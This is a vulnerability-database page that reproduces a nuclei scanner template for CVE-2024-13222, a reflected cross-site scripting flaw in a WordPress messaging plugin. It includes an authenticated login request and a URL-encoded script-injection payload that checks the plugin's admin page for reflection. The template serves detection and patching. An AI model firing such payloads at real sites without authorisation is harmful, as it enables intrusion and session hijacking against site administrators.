Lucene search
K

WordPress User Messages <= 1.2.4 - Reflected XSS

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WordPress User Messages plugin up to 1.2.4 exposes reflected XSS from unsanitized input via URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13222
31 Jan 202506:16
circl
CNNVD
WordPress plugin User Messages 安全漏洞
31 Jan 202500:00
cnnvd
CVE
CVE-2024-13222
31 Jan 202506:00
cve
Cvelist
CVE-2024-13222 User Messages <= 1.2.4 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51441
3 Oct 202520:07
euvd
NVD
CVE-2024-13222
31 Jan 202506:15
nvd
OSV
CVE-2024-13222
31 Jan 202506:15
osv
Patchstack
WordPress User Messages plugin <= 1.2.4 - Reflected XSS vulnerability
31 Jan 202508:37
patchstack
Positive Technologies
PT-2025-2076
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13222
23 May 202507:10
redhatcve
Rows per page
id: CVE-2024-13222

info:
  name: WordPress User Messages <= 1.2.4 - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WordPress User Messages plugin <= 1.2.4 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires victim to load a maliciously crafted URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/069e1f81-448d-4d27-b288-87111dade2f2/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13222
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13222
    cwe-id: CWE-79
    epss-score: 0.00567
    epss-percentile: 0.42917
    cpe: cpe:2.3:a:marvinlabs:user_messages:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/user-messages/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,marvinlabs,user-messages,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=user-messages&view=um-show-message-view%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&filter_type=testxss%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>", "user-messages")
        condition: and
# digest: 4a0a00473045022073ddfa3ad7e306bf205a8bc65ad698d51680728d9f609631210a60ba263891650221008356f274ab50835bc55ae7a21cd13f546bd38fb1770f47d2d15ab4ee756be13b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 06:12Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00567
SSVC
13